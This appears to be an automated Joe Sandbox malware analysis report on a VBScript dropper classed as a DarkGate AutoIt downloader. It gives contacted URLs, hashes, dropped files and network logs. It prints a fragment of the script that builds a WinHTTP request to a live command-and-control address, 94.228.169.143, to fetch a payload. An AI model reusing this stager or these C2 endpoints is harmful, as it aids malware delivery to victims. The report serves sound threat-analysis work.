                      http://darkgate.comUAutoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://94.228.169.143:2351cmbpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://94.228.169.143:2351temkwbpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://curl.haxx.se/Pbpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drfalse
                        high
                        https://go.microsoAutoit3.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://go.micrAutoit3.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        https://curl.haxx.se/docs/sslcerts.htmlcurlbpzs.exefalse
                          high
                          https://curl.haxx.se/docs/sslcerts.htmlbpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drfalse
                            high
                            https://curl.haxx.se/docs/copyright.htmlDbpzs.exe, 00000004.00000000.366979328.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375677782.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drfalse
                              high
                              http://94.228.169.143:2351/Fwscript.exe, 00000001.00000003.366588675.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE2E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.228.169.143:2341/msibpzszuqibpzs.exe, 00000005.00000002.383511096.000001CC7755B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.228.169.143:2351/bpzszuqi3?wscript.exe, 00000001.00000002.366889695.00000185E1BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.228.169.143:2351/tembpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.228.169.143:2351Obpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              https://curl.haxx.se/docs/copyright.htmlbpzs.exefalse
                                high
                                http://94.228.169.143:2351tembpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                https://curl.haxx.se/bpzs.exefalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  94.228.169.143
                                  unknownRussian Federation
                                  49245SSERVICE-ASRUtrue
                                  Joe Sandbox Version:38.0.0 Beryl
                                  Analysis ID:1313188
                                  Start date and time:2023-09-23 08:01:08 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 4m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:1.vbs
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winVBS@10/5@0/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 95%
                                  • Number of executed functions: 51
                                  • Number of non-executed functions: 251
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): svchost.exe
                                  • Execution Graph export aborted for target Autoit3.exe, PID 6116 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  08:02:02API Interceptor2x Sleep call for process: wscript.exe modified
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\bpzs\bpzs.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):893608
                                  Entropy (8bit):6.620131693023677
                                  Encrypted:false
                                  SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                  MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                  SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                  SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                  SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  • Antivirus: Virustotal, Detection: 3%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\cmd.exe
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):424448
                                  Entropy (8bit):6.424280535341311
                                  Encrypted:false
                                  SSDEEP:12288:dgyHCwjz3TyXFuMGvt8EGuV6NHGJnE1PpkRS:dgyHCwjz3CFvUt8EGk/RS
                                  MD5:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                  SHA1:384CCB2CF4B457DA554EE9100BE26FC332155C56
                                  SHA-256:04AA05D63E3639F90995AFC0E635DAD45E57AFC858A88AC10EDE7C984043C781
                                  SHA-512:39F32F238936488D8D174AA6CE7A91948DF98C3FFC67203B8C04546EC187C91F33D8A90A9EB46832D0924C98D7F01A078C6195DFC44E029F74392976B07D5786
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,k3.h.]Vh.]Vh.]V...Vc.]V.h^Wa.]V.hXWu.]V.hYWz.]Var.V(.]V.h\Wo.]Vh.\V..]V.iUW..]V.i.Vi.]Vh..Vi.]V.i_Wi.]VRichh.]V........PE..d...TZ.Z.........."...........................@..........................................`.................................................<>...............p...................... ..T............................ ...............................................text...p........................... ..`.rdata..............................@..@.data...h....`.......D..............@....pdata.......p... ...F..............@..@.rsrc................f..............@..@.reloc...............l..............@..B........................................................................................................................................................................................................................................................
                                  Process:C:\bpzs\bpzs.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:modified
                                  Size (bytes):930759
                                  Entropy (8bit):6.1368906225930795
                                  Encrypted:false
                                  SSDEEP:12288:PZWrNpQ6hkQT7ztyJ2ZqRGaQ7lihLvIat6/WuATZZXTuADb2l4tXWIXSPH/O+:PMDQ6h97tyJAUGaElGX6e7ny6z+H/X
                                  MD5:0EA7D1A7AD1B24835CA0B2FC6C51C15A
                                  SHA1:C470650DB0B249737B5CF84854292BA0B7EC68F7
                                  SHA-256:F9E6958800B576B94C26FD16691CA8E1CA7BDA7A0ABF0A8657D7CB0EB9A696DE
                                  SHA-512:1F3D5738E84A955A053DB7AC2C78E4A08154C0022F7D5E130BDCE5C41CEF25692D2E15A0FE80E641E4DED1308EDE5673D1FB7635F5FC7BEBE887A239201D4A7B
                                  Malicious:false
                                  Reputation:low
                                  Preview:KHeVRNjfoJmVTEHLrUaIriDtmrZcNXgcaBwWefZHWdzlqtBlaJbQyFKiNwWzzttiTofwoXrVYbTIKIOKyDcmLvrQBnFsIKPKUXLgsSpYeXGoxAamtFTHWBDNYahuskRQmiKjzIBeamucQPcDSwhhimhEDVhnuTfuDfvjiDsMxxhSKmNjFrusMgyhRnBHtFqYdCemfeLFjkoFUslkPedpqhEwmxIfIftQvSSSpdnDWhGeSBHAhdyzLBgLqZoluUoURWMbaJiJzcrfTWsJSoRThTvuEuAzyrjTcqIiNvtmIOZuXFQZInoTYgwgHqSsCFvhpdvhrgsMmlCFVtJuQgOrSzMMZwmmcLuOrTIqQWqTdtsvpXKEfDmEOCDnnCWAjBKBxXczAsbAYqhtwQNWOUwtVkQXcBIyTKcVwgZSZkYOPledvqVCIWaWMIYnWqyvULreDQTigFjXwpJXfErjchCVZBlRDVSBKVBYJYXBbcwCNRRAgHtsNCzyJHrBEvIbCwOggitDfqdnInUgSpxmiLjidmNvIahayotTMAjrYBdafazixjkMfRSbJSDLxXWEnnNkTLoqDigUYHOWRPtyXHGCrsyVIEeNyZxQxfAAdZBmlNjJLwRLFyAIeWSJZoaCuXkfQADpVgiDSdEHAkFzylvNmgJUjDAThwRjWucDRZGEPsnYweTzyuhJwOFFWYPHCDsTkOxHOsglfySPASXhcbsMAdWfcjyKloTJEmhobsAFMrujwhnDgOGJEACTnTBSDuIRCZvLdsodMZqjNtvElTxKcWaEsTqRLygmbOvGJhChiyxMMQgJoeixEACfhdGtEYQADVjiUPfDdaaRxFngPPacfMaDxuEgSixagrJTbKroAPDpIGRQQYhcPwRleUOKXfQLnCLRIGrwEjhbZHbvTgDzfMjFVJgIfNVvaEcAGFNsvDfOMmelZtmQNhQsPXXBoRRAVgoTabYEfwnpbSypLuWYNxgwFXYPkWShctUqkHWV
                                  Process:C:\bpzs\bpzs.exe
                                  File Type:ASCII text, with CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):557
                                  Entropy (8bit):3.3684726192231254
                                  Encrypted:false
                                  SSDEEP:12:Vz6ykymUexb1U9cZVvSRCN+ZNVuhNFsVwYAZ:HkyH+bJrqRxrVwYAZ
                                  MD5:CC9BBF2639EE7C9CAC70F2083D151DD7
                                  SHA1:8E1548A0B16F57BD3F6070803A6610992126EF92
                                  SHA-256:7AB11FB093E82E6CDECF73E6C6F3291765A50EE5100503BE410E57D141023DF4
                                  SHA-512:6A839C05026EC3D807ACE2325BC3DF5B372222FC4FAF9B921AEDF2DD3F86E3A7145786DB42CCE8D4FB94A5DC0217B38CFF8D6FDADE91D3050139B01E53504A95
                                  Malicious:false
                                  Reputation:low
                                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 908k 0 3858 0 0 3858 0 0:04:01 --:--:-- 0:04:01 5872. 16 908k 16 145k 0 0 145k 0 0:00:06 0:00:01 0:00:05 89220. 38 908k 38 347k 0 0 173k 0 0:00:05 0:00:02 0:00:03 119k.100 908k 100 908k 0 0 302k 0 0:00:03 0:00:03 --:--:-- 255k..
                                  File type:data
                                  Entropy (8bit):3.129280035733884
                                  TrID:
                                    File name:1.vbs
                                    File size:3'792 bytes
                                    MD5:317f213abccd88f7b240063e2bf9995d
                                    SHA1:66e0867a6f86fe25cf6773e58a8ff9ebb34fa36e
                                    SHA256:82e5409032e3d8d85390982fe99a86aa9f313f3c7b68c1e3fb4541d81fe9e24a
                                    SHA512:f52e6bd8ce2ea57572f11ba4aa2eac8c5ede8115da9732861361a14d4c89d032527f8e74995ffa7bf8585758545d242484d4db5b38674667d00dd9f1a85f5d08
                                    SSDEEP:24:Te9j+Pz0xr+QhKF6tkta+s6OD56SdsO9QZPXQnXngboF3ztzqMKJOIZytANYL4:T6T+D4kU36OD5BUyXg8ptzWJOIZyaYL
                                    TLSH:FA71D8BB42CC0192D9E623F2000735F265BEC034F258D271F0BC83A027172ACE1D81B9
                                    File Content Preview:qcfrjgeqtf = "Shell.Application"..sgaqwhqlaeth = "cmd"..if sgaqwhqlaeth = "a" then..MsgBox "Libr"..end if....ejkmjmkhqq="http://94.228.169.143:2351/bpzszuqi"..ymhezvoguki="WINHTTP.WinHTTPRequest.5.1"..if sgaqwhqlaeth = "a" then..MsgBox "Libr"..end if.....
                                    Icon Hash:68d69b8f86ab9a86
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684TCP2048098ET TROJAN DarkGate AutoIt Downloader23514971394.228.169.143192.168.2.3
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 23, 2023 08:02:02.677184105 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.005805016 CEST23514971394.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:03.006094933 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.007694960 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.355653048 CEST23514971394.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:03.355684042 CEST23514971394.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:03.355703115 CEST23514971394.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:03.355977058 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.355977058 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.356231928 CEST497132351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:03.684355021 CEST23514971394.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:03.842300892 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.163933992 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.164213896 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.164887905 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.489535093 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489603996 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489641905 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489681959 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489700079 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.489720106 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489752054 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.489761114 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489799023 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489808083 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.489836931 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489875078 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489886999 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.489912033 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.489953995 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.811621904 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811691999 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811728954 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811767101 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811774015 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.811810017 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811846018 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.811851978 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811889887 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811899900 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.811928034 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811965942 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.811971903 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.812001944 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812040091 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812052965 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.812076092 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812112093 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812124968 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.812148094 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812184095 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812191010 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.812221050 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812258005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812262058 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.812294960 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812333107 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:04.812340975 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:04.867217064 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134026051 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134094000 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134131908 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134171009 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134176970 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134212971 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134234905 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134263992 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134300947 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134308100 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134341955 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134378910 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134393930 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134417057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134454012 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134541035 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134674072 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134742975 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134774923 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134855986 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134941101 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.134959936 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.134996891 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135034084 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135039091 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135104895 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135143995 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135152102 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135211945 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135256052 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135324001 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135399103 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135436058 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135446072 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135529041 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135574102 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135592937 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135684013 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.135730982 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.135790110 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136018038 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136068106 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.136082888 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136197090 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136241913 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.136270046 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136594057 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136631966 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136642933 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.136672974 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136713982 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.136740923 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136809111 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.136852026 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.188875914 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.188942909 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.189013004 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456074953 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456145048 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456187010 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456209898 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456223965 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456267118 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456270933 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456393003 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456432104 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456444979 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456546068 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456587076 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456602097 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456625938 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456664085 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456672907 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456701994 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456746101 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456770897 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456870079 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456922054 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.456938982 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.456975937 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457017899 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457043886 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457110882 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457161903 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457217932 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457258940 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457303047 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457326889 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457365990 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457408905 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457433939 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457470894 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457506895 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457514048 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457577944 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457617044 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457623005 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457684994 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457741022 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457756042 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457859993 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457907915 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.457947016 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.457989931 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458024979 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458033085 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458126068 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458174944 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458306074 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458448887 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458503008 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458534002 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458570957 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458606005 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458614111 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458673954 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458709955 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458720922 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458776951 CEST23514971494.228.169.143192.168.2.3
                                    Sep 23, 2023 08:02:05.458826065 CEST497142351192.168.2.394.228.169.143
                                    Sep 23, 2023 08:02:05.458864927 CEST23514971494.228.169.143192.168.2.3
